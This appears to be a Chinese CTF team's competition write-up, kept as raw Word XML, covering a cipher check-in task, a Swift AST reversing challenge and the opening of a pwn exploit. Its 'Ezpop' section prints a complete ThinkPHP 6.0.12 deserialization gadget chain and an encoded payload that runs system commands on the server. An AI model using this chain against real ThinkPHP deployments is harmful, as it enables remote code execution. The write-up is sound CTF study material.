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星河战队WRITEUP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战队信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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战队名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>星河</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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战队排名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>193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解题情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>请粘贴战队排名截图和答题情况截图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="16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示例的操作流程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="16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“详细数据”→ “解题总榜”→“找到您所在队伍”→“截图”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>（提交的时候请把下图替换为您队伍解题总榜上的排名截图）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1539875"/>
            <wp:effectExtent l="0" t="0" r="635" b="14605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解题过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>签到电台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根据提示得到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2B2B"/>
        <w:ind w:left="24" w:right="24" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="A9B7C6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pP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“弼时安全到达了”所对应的7个电码：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1732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2514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1344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BC3F3C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>0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356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BC3F3C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>0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451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6671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BC3F3C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>00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55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​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模十算法示例：1732与6378得到7000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​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发包示例：/send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="BC3F3C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>?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msg=s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根据密码本 取前28位分为7组再进行模十运算得到密电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2B2B"/>
        <w:ind w:left="24" w:right="24" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="A9B7C6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pP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c1 = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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'1732'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'2514'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'1344'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'0356'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'0451'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'6671'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'0055'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]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c2 = [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'1088'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'3085'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'2306'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'2336'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'9149'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'2563'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'4241'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]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    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2710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 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5599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3640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 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2682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 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9590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 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8134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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6897BB"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>4296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burp抓包修改返回flag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5523230" cy="1842770"/>
            <wp:effectExtent l="0" t="0" r="8890" b="127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Ezpop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ezpop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文章：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begin"/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instrText xml:space="preserve"> HYPERLINK "https://www.freebuf.com/vuls/321546.html" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/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t>https://www.freebuf.com/vuls/321546.html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参考链接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begin"/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instrText xml:space="preserve"> HYPERLINK "https://www.freebuf.com/vuls/321546.html" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/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t>ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户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扫描目录，发现源码www.zip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5722620" cy="3120390"/>
            <wp:effectExtent l="0" t="0" r="7620" b="381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发现反序列化接口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2B2B"/>
        <w:ind w:left="24" w:right="24" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="A9B7C6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="CC7832"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>public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CC7832"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>function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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FFD760"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>test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()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 {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        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FF9E59"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>unserialize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($_POST[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="6A8759"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>'a'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]);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 xml:space="preserve">    }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参考文件写反序列化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168" w:beforeAutospacing="0" w:after="168" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pP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&lt;?php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namespace think{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abstract class Model{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private $lazySave = false;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private $data = [];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private $exists = false;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protected $table;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private $withAttr = [];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protected $json = [];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protected $jsonAssoc = false;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function __construct($obj = ''){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    $this-&gt;lazySave = True;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    $this-&gt;data = ['whoami' =&gt; ['cat /flag.txt']];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    $this-&gt;exists = True;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    $this-&gt;table = $obj;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    $this-&gt;withAttr = ['whoami' =&gt; ['system']];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    $this-&gt;json = ['whoami',['whoami']];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    $this-&gt;jsonAssoc = True;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 }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 }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}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namespace think\\model{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use think\\Model;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class Pivot extends Model{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 }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}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​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namespace{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echo(urlencode(serialize(new think\\model\\Pivot(new think\\model\\Pivot()))));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}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O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2778125"/>
            <wp:effectExtent l="0" t="0" r="63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JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono" w:cs="JetBrains Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono" w:cs="JetBrains Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>flag{b10a9807-6036-48b3-b5eb-c78bc2</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono" w:cs="JetBrains Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>c07c5d}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baby_tree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这题emmm，怎么说呢，算是运气不错，之前写过一个ast的，没写出来，但是这次明显看到ast加了混淆应该，swift ios的东西，也没碰过，本来准备摆了，后面发现，这个题，代码逻辑还是蛮明显的，于是队友去输出别的题，我就死磕re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swift相关知识：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begin"/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instrText xml:space="preserve"> HYPERLINK "https://www.jianshu.com/p/e917bf0e8a7d" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/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t>https://www.jianshu.com/p/e917bf0e8a7d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知道给出的.ast文件是swift源码经过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:ascii="initial" w:hAnsi="initial" w:eastAsia="initial" w:cs="initial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>parse解析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和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default" w:ascii="initial" w:hAnsi="initial" w:eastAsia="initial" w:cs="initial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ast编译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生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default" w:ascii="initial" w:hAnsi="initial" w:eastAsia="initial" w:cs="initial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>AST语法树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2B2B"/>
        <w:ind w:left="24" w:right="24" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="A9B7C6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pP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swiftc -dump-ast LGPerson.swift &gt;&gt; ast.swift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一个发现：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begin"/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instrText xml:space="preserve"> HYPERLINK "https://juejin.cn/post/6844903808120815623" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/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t>https://juejin.cn/post/6844903808120815623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可以通过AST重写Swift代码，可能可以重新编译回Swift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Swift AST 资源管理器：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begin"/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instrText xml:space="preserve"> HYPERLINK "https://github.com/SwiftFiddle/swift-ast-explorer" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/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t>https://github.com/SwiftFiddle/swift-ast-explorer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用于 Swift 源代码的 AST 可视化工具：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begin"/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instrText xml:space="preserve"> HYPERLINK "https://swift-ast-explorer.com/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/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t>https://swift-ast-explorer.com/</w:t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spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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尝试对代码进行重写，其中主要看对应的运算操作和变量的使用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1820525" cy="1647825"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13335"/>
            <wp:docPr id="1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20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函数定义，无关紧要，知道了有两个参数传入，encoded和keyValue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573375" cy="6600825"/>
            <wp:effectExtent l="0" t="0" r="1905" b="13335"/>
            <wp:docPr id="20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7337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变量b，不是很清楚代码逻辑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582900" cy="6486525"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="21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0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变量k，同样没怎么看懂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468600" cy="5543550"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="22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四个变量，r0 r1 r2 r3,且进行了初始化的取值，取值类似于前面的b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621000" cy="6048375"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2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i是range类型的，且初始化参数中使用到了0 b，猜测这里是一个循环遍历操作，后面还有一个4暂时不知道是干嘛的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后面的一段很长，应该是循环里面的操作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973425" cy="1438275"/>
            <wp:effectExtent l="0" t="0" r="13335" b="9525"/>
            <wp:docPr id="24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用到了r0 r1 r2 r3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878175" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="1905" b="11430"/>
            <wp:docPr id="15" name="图片 1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78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对b使用参数i，意思应该是r0=b[i] 后面对应的还有r1=b[i+1]，r2=b[i+2]，r3=b[i+3]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906750" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="14" name="图片 1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赋值完后，有异或操作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849600" cy="4181475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12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操作结果存储在b[i]中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849600" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="13" name="图片 1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异或的第一个参数是r2，第二个参数有一长段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所以是r2^(??)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973425" cy="1828800"/>
            <wp:effectExtent l="0" t="0" r="13335" b="0"/>
            <wp:docPr id="10" name="图片 15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734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先与操作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906750" cy="1495425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13335"/>
            <wp:docPr id="11" name="图片 16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第一个参数要进行+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4201775" cy="1857375"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
            <wp:docPr id="9" name="图片 17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017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这里是k[0]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r2^((k[0]+??)&amp;??))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后面继续根据它的参数对应位置去确定，后面的逻辑和上面差不多，结果是r2^(k[0]+(r0&gt;&gt;4)&amp;0xff)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后面还有三个类似操作，总结如下： b[i]=r2^((k[0]+(r0&gt;&gt;4))&amp;0xff) b[i+1]=r3^((k[1]+(r0&gt;&gt;4))&amp;0xff) b[i+2]=r0^k[2] b[i+3]=r1^k[3]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6087725" cy="6515100"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
            <wp:docPr id="18" name="图片 18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87725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对k进行重新赋值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868650" cy="6981825"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="17" name="图片 19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0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赋值操作为： k[0]=k[1] k[1]=k[2] k[2]=k[3] k[3]=k[0]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220950" cy="8420100"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="16" name="图片 20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7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一段数据，这段数据规整的要死，也是一段关键数据，下面调用了这段数据。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925800" cy="3400425"/>
            <wp:effectExtent l="0" t="0" r="0" b="13335"/>
            <wp:docPr id="8" name="图片 21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 descr="IMG_2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并且做了判断，推测是调用了上面的加密函数，然后判断结果是否相等，典型的字符串加密，那么这里的数据对应的是上面的b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5582900" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="7" name="图片 22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 descr="IMG_27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后面这里的字符串应该对应上面的k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至此大概可以写出原代码，写的过程中发现每次对四个数据进行操作，那么之前提到作用未知的4，应该就是避免数组越界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168" w:beforeAutospacing="0" w:after="168" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/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b = flag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data = [ 88, 35, 88, 225, 7, 201, 57, 94, 77, 56, 75,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         168, 72, 218, 64, 91, 16, 101, 32, 207, 73, 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         130, 74, 128, 76, 201, 16, 248, 41, 205, 103,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          84, 91, 99, 79, 202, 22, 131, 63, 255, 20, 16 ]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k = '345y'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for i in range(len(b) - 4 + 1):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r0 = b[i]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r1 = b[i+1]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r2 = b[i+2]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r3 = b[i+3]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b[i] = r2 ^ ((k[0]+(r0&gt;&gt;4))&amp;0xff)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b[i+1] = r3 ^ ((k[1]+(r0&gt;&gt;4))&amp;0xff)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b[i+2] = r0 ^ k[2]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b[i+3] = r1 ^ k[3]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    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t = k[0]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k[0] = k[1]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k[1] = k[2]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k[2] = k[3]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k[3] = t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 xml:space="preserve">    </w:t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  <w:t>#b == data?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pacing w:before="168" w:beforeAutospacing="0" w:after="168" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono" w:cs="JetBrains Mono"/>
                <w:i w:val="0"/>
                <w:iCs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</w:tbl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根据代码写出逆向脚本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value = [ 88, 35, 88, 225, 7, 201, 57, 94, 77, 56, 75,</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  168, 72, 218, 64, 91, 16, 101, 32, 207, 73, </w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  130, 74, 128, 76, 201, 16, 248, 41, 205, 103,</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">   84, 91, 99, 79, 202, 22, 131, 63, 255, 20, 16]</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>key= [</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>'3'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>'4'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>'5'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>'y'</w:t>
            </w:r>
            <w:r>
              <w:t>]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for k in range(len(value) - 4 + 1):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t = key[0]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key[0] = key[1]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key[1] = key[2]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key[2] = key[3]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key[3] = t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for k in range(len(value) - 4 + 1):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i = len(value) - 4 - k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t = key[0]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key[0] = key[3]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key[3] = key[2]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key[2] = key[1]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key[1] = t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r0 = value[i]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r1 = value[i+1]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r2 = value[i+2]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r3 = value[i+3]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value[i] = r2 ^ ord(key[2])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value[i+1] = r3 ^ ord(key[3])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value[i+2] = r0 ^ ((ord(key[0]) + (value[i] &gt;&gt; 4)) &amp; 0xff)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value[i+3] = r1 ^ ((ord(key[1]) + (value[i+1] &gt;&gt; 2)) &amp; 0xff)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for i in value:</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:t>print(chr(i), end=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>''</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl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尝试运行一下，居然真的可以，属实是运气了，头铁硬解，说实话，正没想到能解，，，，，拿下本次比赛队伍最高分。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6082665" cy="527685"/>
            <wp:effectExtent l="0" t="0" r="13335" b="5715"/>
            <wp:docPr id="25" name="图片 23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7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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> login-nomal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难点在逆向。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使用程序模拟了一个登录，一个whileu循环不断地收取信息，然后解析，类似于一个之前做的报文类的题。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首先通过后端的处理摸清楚报文的格式，然后再去利用漏洞。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4904105" cy="2218055"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="45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这里通过:进行分割，第一部分存在一个数组里面，可以知道数组是2个为一小组的，小组第二部分，为：分割之后的，\n\t去掉之后的部分。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5394325" cy="2279015"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
            <wp:docPr id="46" name="图片 4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之后再次根据\n进行分割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这里先归纳一下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2B2B"/>
        <w:ind w:left="24" w:right="24" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="A9B7C6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pP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（\n\r等）去掉  第一部分 : （\n\r等去掉） 第二部分\n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目前来看，一条报文的形式就是这样，然后继续看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4424045" cy="3777615"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1905"/>
            <wp:docPr id="48" name="图片 4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 descr="IMG_2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可以看出根据第一部分的内容，确定是opt还是msg，规定了msg一次只能发送一条。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4695825" cy="5143500"/>
            <wp:effectExtent l="0" t="0" r="13335" b="7620"/>
            <wp:docPr id="47" name="图片 4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 descr="IMG_2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最后根据opt操作，然后进入下一个while循环，注意到的是最后再次对\n处理了一次，所以发报文要发送\n\n在最后面。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然后看switch下的函数，就关注到了一个点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5611495" cy="1659255"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1905"/>
            <wp:docPr id="49" name="图片 4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 descr="IMG_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2选项的shellcode，这个shellcode之前做过，纯字母即可，条件是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5467350" cy="3248025"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13335"/>
            <wp:docPr id="50" name="图片 4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 descr="IMG_2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1下面登录。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所以写出exp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from pwn import *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p = remote(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>"47.93.176.91"</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>"33269"</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t># p = process('./login')</w:t>
